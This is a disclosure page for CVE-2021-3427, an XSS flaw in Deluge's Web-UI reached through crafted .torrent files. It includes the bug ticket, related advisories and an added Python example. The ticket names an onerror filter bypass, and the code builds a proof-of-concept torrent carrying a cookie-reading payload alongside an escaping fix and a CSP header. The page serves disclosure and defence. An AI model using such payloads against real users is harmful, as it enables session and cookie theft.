CVE-2021-3427: [Deluge] #3460: XSS via malicious .torrent file

The Deluge Web-UI is vulnerable to XSS through a crafted torrent file. The data from torrent files is not properly sanitised and is interpreted directly as HTML. Someone who supplies the user with a malicious torrent file can execute arbitrary JavaScript code in the context of the user's browser session.


Deluge, Mar 1, 2021, 9:23:05 PM, to delug…@googlegroups.com

#3460: XSS via malicious .torrent file
----------------------------+--------------------
Reporter: jasperla | Type: bug
Status: new | Priority: major
Milestone: needs verified | Component: Web UI
Version: develop | Keywords:
----------------------------+--------------------
The Deluge web ui is vulnerable to XSS through a crafted torrent file.

As the data from torrent files is not properly sanitised it’s interpreted
directly as HTML. As such someone who supplies the user with a malicious
torrent can execute arbitrary Javascript code in the context of the user’s
browser session. It should be noted that the Tornado webserver is not
configured to send any `Content-Security-Policy` headers which can help to
mitigate some of the impact. Due to this omission, the attacker can
download/upload arbitrary data from/to remote endpoints.

It should be noted there is some basic filtering such that a `<script>`
doesn’t work, but this can be trivially bypassed by using a construct such
as `<img src="#" onerror=` or just a hidden, remote iframe which loads the
Javascript payload (see the PoC script for an example).

This script creates a PoC torrent to demonstrate the vulnerability:
https://gist.github.com/jasperla/4e6e06034e1cc4131f62839b46b697ef
the attached screenshot is taken after uploading a .torrent file generated
by that script.

Additionally there are several HTML injection bugs, for example in the
"Connection Manager", but these are merely bugs as the local user
injects the payload as opposed to a remote attacker who uploads a
malicious torrent to a public search engine.


Ticket URL: https://dev.deluge-torrent.org/ticket/3460
Deluge https://deluge-torrent.org/
Deluge Project
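The report above describes two things a practitioner will want to see end to end: how the untrusted string actually travels (inside the bencoded `info.name` field of the .torrent) and why a filter that only strips `<script>` is not a fix while output encoding is. The following is an added example written for this page; it is not Deluge's code and not the reporter's gist. The minimal bencode encoder/decoder, the torrent contents, the `naive_filter` model of the "basic filtering" the ticket mentions, the `render_torrent_name` stand-in for the Web-UI's rendering step and the suggested CSP value are all assumptions made for illustration.

```python
"""Added example: malicious torrent name vs. naive filtering vs. HTML escaping.
Not Deluge's code; the bencode helpers and the rendering model are assumptions."""
import hashlib
import html
import re


def bencode(obj) -> bytes:
    """Minimal bencode encoder (int, str/bytes, list, dict with sorted keys)."""
    if isinstance(obj, bool):
        raise TypeError("bool is not a bencode type")
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, str):
        obj = obj.encode("utf-8")
    if isinstance(obj, bytes):
        return b"%d:%s" % (len(obj), obj)
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    if isinstance(obj, dict):
        items = sorted((k.encode("utf-8") if isinstance(k, str) else k, v) for k, v in obj.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in items) + b"e"
    raise TypeError(f"cannot bencode {type(obj).__name__}")


def bdecode(data: bytes):
    """Minimal bencode decoder; byte strings stay bytes (caller decides the charset)."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c == b"l":
            out, i = [], i + 1
            while data[i:i + 1] != b"e":
                v, i = parse(i)
                out.append(v)
            return out, i + 1
        if c == b"d":
            out, i = {}, i + 1
            while data[i:i + 1] != b"e":
                k, i = parse(i)
                v, i = parse(i)
                out[k] = v
            return out, i + 1
        if c.isdigit():
            colon = data.index(b":", i)
            n, start = int(data[i:colon]), colon + 1
            return data[start:start + n], start + n
        raise ValueError(f"bad bencode at offset {i}")
    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing data after bencoded value")
    return value


# Constructed payload: the bypass shape the ticket names (event handler, no <script>).
PAYLOAD = '<img src="#" onerror="alert(document.cookie)">'


def build_poc_torrent(name: str) -> bytes:
    """Single-file torrent whose info.name carries attacker-controlled HTML (constructed data)."""
    piece = b"constructed sample file content"
    info = {"name": name, "length": len(piece), "piece length": 16384,
            "pieces": hashlib.sha1(piece).digest()}
    return bencode({"announce": "http://tracker.example/announce", "info": info})


SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def naive_filter(s: str) -> str:
    """Assumed model of a 'basic filter': removes <script> tags and nothing else."""
    return SCRIPT_TAG.sub("", s)


def escape_for_html(s: str) -> str:
    """The actual fix for text landing in an HTML context: encode, do not blacklist."""
    return html.escape(s, quote=True)


def render_torrent_name(torrent: bytes, sanitizer) -> str:
    """Stand-in for the Web-UI step that puts the torrent name into the page as HTML."""
    name = bdecode(torrent)[b"info"][b"name"].decode("utf-8")
    return f"<td>{sanitizer(name)}</td>"


def contains_event_handler(markup: str) -> bool:
    """True if the rendered markup still carries a live on* attribute on any tag."""
    return re.search(r"<\w+[^>]*\son\w+\s*=", markup, re.IGNORECASE) is not None


# Assumed defence-in-depth header the ticket says the Tornado server does not send.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; "
              "frame-src 'none'; base-uri 'self'")
```

`naive_filter` turns `<script>alert(1)</script>` into harmless text, which is exactly why a tester who only tries `<script>` would report the filter as working; the same filter passes `PAYLOAD` through untouched and the rendered cell still carries a live `onerror`. `escape_for_html` leaves no `<` in the output at all, so the name is displayed but never parsed as markup. The CSP value is a starting point: with `script-src 'self'` an injected inline handler or a remote iframe's script would be blocked even if escaping were missed somewhere, but it has to be checked against what the real UI loads before shipping it.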

Deluge, Mar 1, 2021, 9:23:22 PM, to delug…@googlegroups.com

#3460: XSS via malicious .torrent file

-----------------------+---------------------------
Reporter: jasperla | Owner:
Type: bug | Status: new
Priority: major | Milestone: needs verified
Component: Web UI | Version: develop
Resolution: | Keywords:
-----------------------+---------------------------
Changes (by jasperla):

* Attachment “deluge xss.png” added.

Deluge, Mar 1, 2021, 9:25:32 PM, to delug…@googlegroups.com

#3460: XSS via malicious .torrent file

-----------------------+---------------------------
Reporter: jasperla | Owner:
Type: bug | Status: new
Priority: major | Milestone: needs verified
Component: Web UI | Version: develop
Resolution: | Keywords:
-----------------------+---------------------------

Comment (by jasperla):

Please close this ticket, it’s a duplicate of #3459.


Ticket URL: https://dev.deluge-torrent.org/ticket/3460#comment:1

Related news

Gentoo Linux Security Advisory 202210-07

Gentoo Linux Security Advisory 202210-7 - A vulnerability has been found in Deluge which could result in XSS. Versions less than 2.1.1 are affected.

GHSA-5c8p-qhch-qhx6: Deluge Web-UI vulnerable to XSS through a crafted torrent file

The Deluge Web-UI is vulnerable to cross-site scripting through a crafted torrent file. The data from torrent files is not properly sanitised and is interpreted directly as HTML. Someone who supplies the user with a malicious torrent file can execute arbitrary JavaScript code in the context of the user's browser session.
